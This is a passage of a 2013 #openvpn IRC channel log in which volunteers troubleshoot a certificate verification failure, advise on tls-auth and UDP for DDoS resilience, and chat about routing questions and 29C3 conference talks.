timeout: 252 seconds] 17:40 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn 17:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 18:12 <+dvl> using ssl-admin, I see crl.pem in the prog directory? that seems like I shouldn't be picking that up directly. But that's exactly what I plan to do. 18:33 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 18:43 <@krzee> just make sure its new 18:57 <+dvl> Yeah, it is. 18:57 <+dvl> Got server started with new keys and ca.crt 18:57 <+dvl> but? client can't authenticate yet 18:58 <+dvl> server say: TLS Error: TLS handshake failed 18:58 <+dvl> client says: TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed 18:59 <+dvl> just verified cert on client: openssl verify -CAfile ca.crt client.crt 19:00 <+dvl> And done similar on server. 19:03 <+dvl> same issue, both server and client cert: openssl x509 -subject -issuer -noout -in client.crt 19:05 <+pekster> Read the client error more careefully: it's complaining about the server certificate (the one being presented to it from the server) 19:05 <+pekster> The client is failing to verify the cert presented over the wire against the locally configured CA cert file 19:07 <@krzee> md5 both ca.crt's 19:08 <@krzee> be sure they match (assuming they're supposed to, which they normally are) 19:09 <+dvl> both certs are valid from 2 jan, and it's 3 jan (utc) 19:09 <+dvl> yeah, I did that, will do it again 19:10 <+dvl> # md5 ca.crt | grep b45a9a69e954ea70cbfd7c3bb46537e0 19:10 <+dvl> MD5 (ca.crt) = b45a9a69e954ea70cbfd7c3bb46537e0 19:10 <+dvl> they match 19:10 <+dvl> pekster: I see what you mean. 19:11 <+dvl> pekster: so, I'm wondering how that's possible if the ca.crt file is the same .. .checking 19:11 <+pekster> Who says your server's currently used cert was actually signed by that CA? ;) 19:12 <@krzee> !certinfo 19:12 <@vpnHelper> "certinfo" is run `openssl x509 -in -noout -text` for info from your cert file 19:12 <@krzee> err no 19:12 <@krzee> !certverify 19:12 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 19:12 <@krzee> that ^ 19:12 <+pekster> Well, that could be updated to indicate that you need to check the *opposing* peer's cert against your *local* CA 19:13 <@krzee> pekster, ya but i dont wanna get confusing, anyone asking about this stuff should be using the same ca.crt on both sides 19:13 <+dvl> I've run verify already (see above), but I'll run it again. 19:13 <+pekster> dvl: No, you checked the *client* cert against the *client's* CA cert. That's not what you need to be doing 19:13 <@krzee> pekster, the ca.crt's match md5 19:14 <+pekster> So? The server doesn't check its own cert against the CA 19:14 <+dvl> pekster: we've already established that the ca.cert match 19:14 <+pekster> The client does 19:14 <@krzee> checking against local ca.crt IS checking against the other side 19:14 <@krzee> since they are the same exact ca.crt 19:14 <+pekster> Oh, if the CA's match and he did that on the server too? 19:14 <+pekster> k 19:14 <+pekster> nvm, I missed that part 19:14 <@krzee> right, needs to do it on server too 19:15 <+dvl> I ran verify before, on both client and server. Just ran it again. 19:15 <+dvl> I also checked that the openvpn.conf file referred to said ca.crt 19:16 <+dvl> Hmmm. 19:16 <+dvl> FWIW, this was a working configuration before I changed the certs 19:16 <@krzee> run ntpdate on both machines? 19:16 <@krzee> although the error should be different if it was time 19:17 <+dvl> yes 19:17 <+pekster> You checked directories? Sometimes if you do (or don't) use a 'cd' dir your relative path can be misleading 19:17 <+dvl> times match. just verified. 19:18 <@krzee> ^ same if you chroot 19:18 <+dvl> pekster: no relative paths in config file. I copy pasted the names and ran verify again. 19:18 <+pekster> Upping the verbosity might help too: verb 5 is a good place to start (not sure offhand if higher levels of debug verbosity, say 6-7 would be more helpful with TLS issues) 19:18 <+dvl> no chroot involved. 19:18 <+dvl> Bumping verb on client 19:18 <@krzee> i would never use more than verb 5, plaisthos might tho 19:19 <@krzee> since he digs in that code, and im a mere user 19:19 <+dvl> ahuh 19:19 <+dvl> openvpn[73944]: VERIFY nsCertType ERROR 19:19 <+pekster> There ya go 19:19 <+dvl> there you go? I bet it's the client, not hte server. 19:19 <+dvl> Fixing. 19:19 <@krzee> ahh 19:20 <@krzee> well depends how you look at it 19:20 <@krzee> the problem is the server cert, or the client config 19:20 <+pekster> That can be either. 'nsCertType' is a Netscape-era option; personally, I prefer using KU/EKU fields, but they all really do the same thing 19:20 <@krzee> although if you say the problem is client config, you may be open to MITM attacks 19:21 <@krzee> yep^ i say "may" because theres 2 ways to check it is signed as the server (what pekster said above) 19:21 <+dvl> I've been using ssl-admin for the first time. I *know* I created both certificates with the same steps. 19:21 <+pekster> krzee: I just hate "Netscape" crap in my certs :P (call me a purist if you like :D ) 19:21 <+dvl> S) Create new Signed Server certificate 19:21 <+dvl> I shall update my notes. 19:22 <@krzee> :D 19:22 <+dvl> Folks: I'm sure this is the problem. Thank you for bearing with me. :) 19:22 <+pekster> Well, ssl-admin apparently doesn't include the nsCertType X509 field. It's a dumb field anyway, in my not-so-humble opinion 19:22 <@krzee> yes it does 19:22 <@krzee> i added the option to it years ago 19:22 <@krzee> its the option: S 19:22 <+pekster> Ah. I suppose, if people use the tls-verify directive you'd need it 19:23 * pekster sometimes forgets most folks like helper-directives 19:24 <+dvl> success! 19:24 <+dvl> Thank you folks. FYI, I'm writing up a how-to. 19:24 <+dvl> GOod error. 19:25 <+dvl> I've also raised three tickets. 19:25 <+pekster> When in doubt, get more error verbosity ;) 19:25 <+dvl> [not related to tonight] 19:25 <+dvl> yes. Good plan 19:25 <+pekster> If that fails, open a beer and dig into the code :P (or find help) 19:25 <@krzee> oh maybe im wrong 19:25 <@krzee> i added whatever it was that makes nscerttype server work 19:25 <@krzee> whatever that was, lol 19:26 -!- F^4[A] is now known as F^4 19:26 <+pekster> Yea, that's nsCertType (or w/e the ANSI-name for that field is formally. I'm not OCD enough to find you the OID :D ) 19:26 -!- raidz is now known as raidz_away 19:27 <@krzee> ya niether of us care too much :D 19:28 <@krzee> im working at talking to 2 girls via sms on my phone 19:28 <@krzee> working AND talking* 19:28 <+pekster> Well, I'm watching a 1h talk from 29C3 on the Russian surveillance state. Maybe you're doing it right, I dunno :P 19:28 <+pekster> Some day maybe I'll have a gal that enjoys curling up and watching it too ;) 19:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:30 <@krzee> thats asking too mucg 19:30 <@krzee> much* 19:31 <@krzee> if you can find one who can deal with you watching those all night, shes good enough 19:31 <@krzee> lol 19:31 <+pekster> Could be. I've heard some good questions posed to the speakers from women at 29C3 too ;) 19:31 <@krzee> got the link handy? that sounds good 19:32 <+pekster> Talk ID: 5402 from http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/ (the torrents are mighty fast, and I like taking pressure off the http mirrors.) Full event list here: https://events.ccc.de/congress/2012/Fahrplan/day_2012-12-27.en.html 19:32 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ/ (at mirror.fem-net.de) 19:33 <@krzee> thanks 19:33 <+pekster> J. Appelbaum's opening 'not my department' and the 'enemies of the state' were also good talks. If you're into PKI, the 'certificate authority collapse' was also a nice watch 19:34 <+pekster> Tons of good stuff from this year's conference 19:34 <@krzee> always good stuff at ccc 19:34 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:36 <+dvl> ls all up and running now 19:36 <+dvl> :) 19:37 <@krzee> o/ 19:37 <@krzee> hacking cisco phones… sounds fun! 19:38 <@krzee> <--- likes voip 19:38 <@krzee> shit i wanna see half of these 19:38 <@krzee> i gotta go out there some year 19:46 < kisom> Sucks harald didn't speak at 29C3 19:46 < kisom> In fact, there are no good GSM talks imo 19:47 < kisom> krzee: Need someone to go with? I know I do 19:50 < chrisb> does CCC equal chaos computer club? 19:50 <+pekster> Yea 19:51 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 19:54 <@krzee> sure, wanna pick me up in the caribbean? haha 20:16 < kisom> Cuba? 20:23 <@krzee> 15.3G scanned out of 381G at 3.38M/s, 30h46m to go 20:23 <@krzee> 15.3G resilvered, 4.01% done 20:40 < EugeneKay> k 20:42 < chrisb> krzee: zfs? 20:56 -!- Sorinan [~bcdonadio@177.18.136.35] has joined #openvpn 20:57 < Sorinan> there's a way to specify a command to run before any connection is made in OpenVPN client? 20:58 < Sorinan> or maybe something like ProxyCommand from SSH, to run a command and pipe the connection trough it? 21:06 <@krzee> chrisb, yep 21:07 <@krzee> Sorinan, run the command whereever you start openvpn, and just run the command before you start openvpn 21:07 <@krzee> or have a look at the places scripts hook into openvpn and see if one is what you want 21:07 <@krzee> !script 21:08 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 21:11 < Sorinan> krzee, and it's possible to pipe the openvpn connection through an existing connection? 21:12 < Sorinan> the idea is to automate things with network-manager, so having to create the connection manually beforehand isn't pratical 21:23 <@krzee> i have no idea what you mean 21:23 <@krzee> what existing connection…? 21:32 -!- peper [~peper@gentoo/developer/peper] has quit [Ping timeout: 244 seconds] 21:32 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 240 seconds] 21:33 < Sorinan> krzee, so, basically I can use the ProxyCommand feature in SSH to create a connection to a middleman, instruct this middleman to netcat my final server, and then use this connection to access the final server via SSH 21:33 < Sorinan> I was wondering if I could do something similar with openvpn 21:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 21:33 -!- peper [~peper@gentoo/developer/peper] has joined #openvpn 21:34 < Sorinan> in a nutshell: tell OpenVPN to create a SSH connection to a middleman, forward this connection to the final server, and use this pipe created to communicate 21:44 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 21:53 -!- brute11k [~brute11k@89.249.230.141] has joined #openvpn 21:58 -!- Sorinan [~bcdonadio@177.18.136.35] has quit [Quit: Saindo] 22:03 -!- HyperGlide [~HyperGlid@222.211.121.189] has joined #openvpn 22:04 <+pekster> photo from a 29C3 talk on factoring RSA primes, disscussing in this case a 1024-bit pubkey: http://pekster.sdf.org/misc/bluffdale_power.png 22:05 <+pekster> I've been using larger for some time, but hopefully someone still using key sizes under 2k bits is re-thinking their usage now 22:07 <+pekster> (oh, image updated with a slide a moment later) 22:12 -!- baobei_ [~baobei@58.37.20.245] has quit [Read error: Connection reset by peer] 22:13 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn 22:17 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has joined #openvpn 22:17 < nikoc31337> hey 22:18 < nikoc31337> !welcome 22:18 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 22:18 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 22:18 < nikoc31337> I would like some info related openvpn server ddos protection. 22:18 < nikoc31337> anyone available to give me his lights? :P 22:21 <+pekster> nikoc31337: Your best bet when using X509 is to add a --tls-auth key between peers to prevent the abuse of resources by unauthenticated attackers. The manpage goes into detail on using this and what the technical advantages are that prevent wasting resources from external attackers 22:22 <+pekster> You can also run OpenVPN on a non-standard port (say, a high randomly-selected port.) UDP will also be better, especially when combined with the --tls-auth feature, since it's far less open to port-scanning attacks 22:30 < nikoc31337> Well, im running other hosting services at the moment. 22:31 < nikoc31337> And the company i have my servers on, offers ddos protection for port 80 and 443 22:32 <+pekster> Then I don't really get what you're asking. OpenVPN has some internal protection against the traditional threat of ddos, which is resource consumption and hanging connections. Use of --tls-auth and UDP reduces these impacts. If you want to do upstream filtering of apparent DDoS through your ISP, that's outside the scope of OpenVPN and I'm unclear what you mean if you're asking about that 22:32 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:32 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 22:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:32 -!- mode/#openvpn [+o krzee] by ChanServ 22:34 < nikoc31337> Im hearing all everywhere that VPN Services keep getting hitted by DDOS attacks. 22:35 < nikoc31337> Im planning on starting a VPN Service soon and this is a thing im stuck on. 22:36 < nikoc31337> If someone attack port 1194, would the server go down? 22:36 <+pekster> Depends on the scale of the DDoS. Your best bet if you're concerned about becoming a target (such as a high-profile server, etc) is to do exactly what I said above and use --tls-auth support and run on a non-standard port (something besides 1194 or 5000) 22:37 < nikoc31337> Hm, isn't the port shown on the customers? 22:37 <+pekster> If you have configs that will end up semi-public (to end-users, etc) then the port question is somewhat irrelevant since it would be easy to discover what other port you're using 22:37 < nikoc31337> Yeah.. 22:38 <+pekster> Did you read about --tls-auth in the manpage? I think that basically addresses the resource-exhaustion issue you're primarily concerned with 22:39 <+pekster> Otherwise, feel free to contract with your ISP to throttle requests if you get more than a specified number of new (non-existing) connections in a period of time. I can't help you with that since that would be an issue between you and your ISP 22:39 < Devastator> keep in mind that if your server is hit in a port that's used by another service, your server CAN go down as well, it's the nature of ddos attack, openvpn isn't to blame 22:39 < nikoc31337> yeah, im not planning on hosting something else -- than openvpn server. 22:40 < rkantos> just start off with cloud flare or similiar atleast :D 22:40 < nikoc31337> cloudflare is used for websites :P 22:40 < rkantos> yeah but you never know in this day and age if your 1TB memory server hosts everything you do ;) 22:41 < nikoc31337> :D 22:41 < rkantos> with some 10Gb/s cards, you can do quite the shit with one 4u server 22:42 <+pekster> Save money and buy our meta-basket: it's so good, it'll hold all your eggs without the need to ever worry about baskets again! 22:42 < rkantos> 32 cores, 512GB DDR, 4x10Gb/s ports 10-15k maybe? 22:42 < nikoc31337> Can the server run under port 443? 22:42 < nikoc31337> actually let the customers connect under port 443 22:42 < nikoc31337> which will be filtered 22:43 < rkantos> I'd think it can 22:43 <@krzee> !hmac 22:43 <@vpnHelper> "hmac" is (#1) The tls-auth directive adds an additional HMAC signature to all SSL/TLS handshake packets for integrity verification. Any UDP packet not bearing the correct HMAC signature can be dropped without further processing. The tls-auth HMAC signature provides an additional level of security above and beyond that provided by SSL/TLS. or (#2) openvpn --genkey --secret ta.key to make the tls 22:43 < rkantos> but it'll perhaps create some conflicts? 22:43 <@vpnHelper> static key , in configs: tls-auth ta.key # , 1 for client or 0 for server in the configs 22:43 < nikoc31337> you say? 22:43 <+pekster> rkantos: TCP is far more abusive and resource-consuming in early connections than UDP, and also has its own set of problems. Unless you need TCP, you shouldn't use it 22:44 <+pekster> !tcp 22:44 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 22:44 < nikoc31337> so, pekster 22:44 <@krzee> and with udp you can add hmac signatures 22:44 < rkantos> pekster: yeah 22:44 < nikoc31337> do you think it would create any conflicts 22:44 <@krzee> which is an anti layer 7 ddos feature 22:45 < nikoc31337> if it was running under port 443? 22:46 <+pekster> "conflicts" ? Not unless something else is using that port. A port is a number. You can run OpenVPN on UDP 443, TCP 443, UDP port 1, or UDP port 65535. It's just a number 22:46 < rkantos> well 443 is used by HTTPS.. 22:46 < nikoc31337> With traffic filtering. 22:46 <+pekster> I've no clue since I'm not your ISP and have no idea how your ISP filters 22:46 <+pekster> !notovpn 22:46 < rkantos> but ofcourse that doesn't matter for the client 22:46 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 22:47 < rkantos> what is it with everybody on this channel knowing how to use the !-marks 22:47 < rkantos> or spawn them in an instant :D 22:47 <+pekster> rkantos: Becuase people who come here often ask the same questions our bot can answer 22:48 <+pekster> I'm not going to type out several answers explaing that I can't explain a question about an ISP I have never worked with before 22:48 < rkantos> yeayea, but why does everyone know the commands in an instant 22:48 <+pekster> I use dozens of them frequently. You can find a full list here: 22:48 <+pekster> !factoids 22:48 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 22:48 < nikoc31337> Thanks for the help pekster:) 22:49 <+pekster> nikoc31337: Yup. Ultimately I think you're better off using OpenVPN on UDP, change the port if you like (not really helpful, but maybe a little) and use --tls-auth. That's *probably* better than any filtering your ISP can do 22:50 <+pekster> If you need more than that, invest in hardware solutions or contract upstream (ISP, hosting provider, etc) for further protection closer to the Internet source 22:54 < nikoc31337> in your opinion the best OS to run the server on is? 22:54 <+pekster> !bestos 22:54 <@vpnHelper> "bestos" is the best os for openvpn is the one you are most comfortable with 22:54 < nikoc31337> that's cool 22:54 < nikoc31337> thanks a lot mate 22:54 <+pekster> Depends on what you want to do, really ;). I'd recommend a Linux or Unix varient, but that's just me personally 22:54 < nikoc31337> appreciate it :) 22:54 < nikoc31337> yeah im using centos:) 22:54 <@krzee> if you're worried about dos attacks you should be on udp 22:55 < rkantos> aren't most vpn services udp anyway? 22:55 <+pekster> Yea, that was my advise too; the ISP apparently offers some "filtering" service for select ports, but I'm guessing it's based on protocol (bound to those ports, perhaps) and not the ports themselves 22:55 < rkantos> or both 22:55 <@krzee> tcp cant use hmac sigs which means layer7 can be attacked 22:55 <@krzee> yep 22:56 < nikoc31337> do you think if i use the server with GUI admin panel 22:56 < nikoc31337> It would make the server unstable or something. 22:56 < nikoc31337> Generate of customer configs is easier with gui 22:56 <@krzee> if you must go that route, firewall the hell out of that crap 22:56 < rkantos> nikoc31337: cloudflare? 22:56 < rkantos> or wha 22:57 < nikoc31337> ? 22:57 < rkantos> what kind a GUI you mean? 22:57 <@krzee> in fact maybe only run it on a separate vpn server ip that only you have pki into 22:57 <@krzee> and dont allow any ip forwarding to that interface 22:58 < nikoc31337> Yeah i had this on my mind 22:58 < nikoc31337> Admin web interface, is installed always when installing a access server? 22:58 <+pekster> krzee: Um, I just turned on tls-auth in a tcp-server configuration and it worked fine. You can still handshake across TCP, but the HMAC and packet-dropping feature works just fine 22:58 <@krzee> coulda sworn that was udp only! 22:59 <+pekster> Nope. it's applied right to the TLS channel directly 22:59 <+pekster> (think of it sorta like 802.1Q) 23:02 <+pekster> Remember that it's just TLS; the data channel itself doesn't have any extra signature added since the goal is to prevent abuse of resources handshaking, encoding, and decoding TLS traffic (which is computationally expensive.) Mallicious handling of data-stream packets is detected via normal hashing methods and dropped as malformed, but that's far-cheaper in terms of computing power 23:10 <@krzee> meh and the manual clearly says "on the udp/tcp port" i wonder where i got that false idea 23:10 -!- hounge [~andro@5.254.147.250] has joined #openvpn 23:13 <@krzee> so it always hashes the control channel packets 23:14 <+pekster> Well, the control channel is secured via X509 pubkey crypto. --tls-auth adds an *extra* symmetric-based hash on top of this so the receiver doesn't have to use (expensive) pubkey crypto to see if the sender knows the PSK 23:15 <@krzee> and stops something like slowloris-ovpn from existing 23:30 -!- hounge [~andro@5.254.147.250] has quit [Ping timeout: 256 seconds] 23:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] --- Day changed Thu Jan 03 2013 00:06 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 00:14 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 00:21 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has joined #openvpn 00:23 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 252 seconds] 00:34 -!- AndroUser2 [~andro@5.254.147.182] has joined #openvpn 00:36 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 00:38 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has quit [Ping timeout: 255 seconds] 00:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 00:53 -!- AndroUser2 [~andro@5.254.147.182] has quit [Ping timeout: 272 seconds] 00:55 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Quit: Ex-Chat] 01:35 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 01:47 -!- F^4 is now known as Yawa 01:57 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 02:02 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:17 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 244 seconds] 02:36 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has joined #openvpn 02:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 240 seconds] 02:40 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has quit [Ping timeout: 240 seconds] 02:41 -!- cosmicgate- [~cosmicgat@198.147.22.172] has joined #openvpn 02:41 -!- HyperGlide [~HyperGlid@222.211.121.189] has left #openvpn ["Leaving..."] 02:48 -!- cosmicgate- [~cosmicgat@198.147.22.172] has quit [] 03:13 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn 03:23 -!- Denial [Denial@92.239.45.77] has joined #openvpn 03:40 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has quit [] 04:17 -!- baobei_ [~baobei@58.37.20.245] has quit [Quit: Leaving] 04:21 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 04:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Ping timeout: 248 seconds] 05:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:36 -!- dazo_afk is now known as dazo 05:43 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:44 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 06:53 -!- m0sphere` [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 06:53 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer] 07:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 07:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 07:40 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 07:53 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Remote host closed the connection] 07:57 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds] 07:59 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn 08:04 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has joined #openvpn 08:05 -!- zol_ [~z@del63-4-78-248-82-46.fbx.proxad.net] has joined #openvpn 08:06 < manitu> hi ho.. can i use openvpn as proxy?.. i tried it like that: get the google.com dns, "ip route add google_ip/32 via my_vpn_ip" and then "ping google.com" .. before i got an answer from google, after adding the route there is no answer anymore 08:08 <@dazo> manitu: no, openvpn is not a proxy .... openvpn is a VPN solution, which is completely different from what a proxy does 08:10 < manitu> dazo: i know.. but i have a ipsec network without any leftsubnet.. i want to connect to a server by openvpn to access the ipsec devices.. thats the problem if not every devices knows openvpn :/ 08:10 < manitu> *device 08:10 <@dazo> then you need to learn about routing 08:12 < zol_> Is it intersting to put a 8192 rsa key ? ( not 1024 or 2048 defaut ) 08:12 < zol_> or 4096 08:12 < manitu> yea.. but thats a problem, because in ipsec you need to define a "leftsubnet", so the ipsec server accepts traffic from this subnet.. but the server provider can't add any subnet in that "device" for me.. so i need to rewrite the source ip, like a proxy does.. i hoped that openvpn could manage that, if i define the destination address-range 08:14 < manitu> i also can connect to ipsec on the client, which is already connected to the central openvpn server.. but i'm thinking of "routing" this traffic as a really nice way.. and not every device needs the ipsec client 08:16 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has joined #openvpn 08:16 < nikoc31337> Hey, i have one question. 08:16 <@dazo> zol_: the stronger key, the longer it will take to crack it 08:16 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 264 seconds] 08:16 < nikoc31337> Is it possible to generate client config 08:17 < nikoc31337> through the admin web gui? 08:17 <@dazo> nikoc31337: sounds like you should as in !AS 08:17 <@dazo> !AS 08:17 <@vpnHelper> "AS" is please go to #OpenVPN-AS for help with Access-Server 08:17 <@dazo> (the community edition doesn't have any admin web gui) 08:17 < nikoc31337> Thanks ! 08:17 <@dazo> no worries! 08:18 <@dazo> manitu: I have no experience with ipsec ... so I dunno how this leftsubnet works .... 08:26 -!- brute11k [~brute11k@89.249.230.141] has quit [Ping timeout: 265 seconds] 08:30 -!- brute11k [~brute11k@89.249.230.141] has joined #openvpn 08:33 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 08:34 < manitu> dazo: going to try a NAT with iptables now.. i hope that works somehow.. and thank you :) 08:36 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn 08:37 < pie__> Is there a way to add an arbitrary lan ip to the vpn? 08:37 < pie__> So for example I could access 192.168.1.43 via 10.3.0.14 or somesuch 08:38 < pie__> this is on the server lan 08:40 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 08:46 <@ecrist> dvl: ping - I replied to your email, update to ssl-admin in the pipe 08:46 < dvl-_> checking... 08:49 -!- plaisthos [~arne@kamera.blinkt.de] has quit [Changing host] 08:49 -!- plaisthos [~arne@openvpn/developer/plaisthos] has joined #openvpn 08:49 -!- ServerMode/#openvpn [+v plaisthos] by verne.freenode.net 08:49 -!- mode/#openvpn [-v plaisthos] by ChanServ 08:49 < dvl-_> updating 08:49 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping timeout: 255 seconds] 08:51 -!- plaisthos [~arne@openvpn/developer/plaisthos] has quit [Changing host] 08:51 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 08:51 -!- mode/#openvpn [+o plaisthos] by ChanServ 08:51 <@ecrist> EugeneKay: ping - please contact mattock when you've time 08:51 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn 08:53 < EugeneKay> Mrh 08:53 < EugeneKay> Like, by email? 08:54 * plaisthos can now no longer hide as "just a visitor without op/voice" 08:54 <@ecrist> lol 08:54 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 08:54 <@ecrist> EugeneKay: IRC/PM or email - he has a present for you 08:54 < EugeneKay> If he needs my address, `whois eugenekay.com` 08:55 <@ecrist> kk 08:55 < |Mike|> lol 08:55 <@ecrist> is your shirt size listed there, too? 08:55 < EugeneKay> Possibly, but XL is fine. 08:55 < |Mike|> xs! 08:56 -!- mode/#openvpn [+v EugeneKay] by ChanServ 08:56 <+EugeneKay> I must have reconnected at some point. I knew something was missing 08:56 <@mattock> EugeneKay: roger that 08:57 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Quit: Changing server] 08:57 <+EugeneKay> <3 08:59 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 08:59 -!- mode/#openvpn [+o plaisthos] by ChanServ 09:22 < dvl-_> ecrist : typo in 1.0.5, see email 09:24 -!- StFS [~stefan@gagnasetur.ru.is] has left #openvpn [] 09:24 <@ecrist> *grumble* 09:25 <@ecrist> ah, that's relatively minor, though. 09:26 < dvl-_> yeah... but it's conifiguration... ;) 09:36 < dvl-_> ecrist: Am I correct in seeing that the question: Can I move signing request (supernews.example.org.csr) to the csr directory for archiving? (y/n): ===> supernews.example.org.csr moved. 09:36 < dvl-_> ... is always ignored? I don't recall answering that question. 09:38 <@ecrist> in 1.0.5 it's answered as 'y' automatically when you use option 4 09:39 < dvl-_> Good. 09:39 <@ecrist> dvl-_: the config filename typo - been around for nearly 4 years in that state, you're the first to mention it 09:40 <@ecrist> not anticipating a flood of email 09:40 <@ecrist> ;) 09:41 < dvl-_> It's not been written up on FreeBSD Diary before. ;) 09:43 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 09:44 <@ecrist> heh 09:49 < dvl-_> ecrist: I ran 1.0.5 and updated the post with the new 'screen shots'. 09:49 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has quit [Quit: manitu] 09:52 <@ecrist> did the rest of my notes make sense? 09:56 <@ecrist> dvl-_: on freebsd, if you're using the openvpn port install, you can just use relative pathing the config 09:57 <@ecrist> so, if you're putting your keys in /usr/local/etc/openvpn/keys, you can just have keys/ca.crt, etc 09:57 <@ecrist> the openvpn rc script adds the --cd option to the startup, and makes /usr/local/etc/openvpn the pwd 09:58 < dvl-_> ecrist: which will make chroot easier.... 10:01 < dvl-_> ecrist: I've made that note in the post. 10:10 < dvl-_> ecrist: OK, ready to publish. Schedule for 9pm tonight. 10:10 <@ecrist> neat! 10:12 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 10:16 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.3.9.2"] 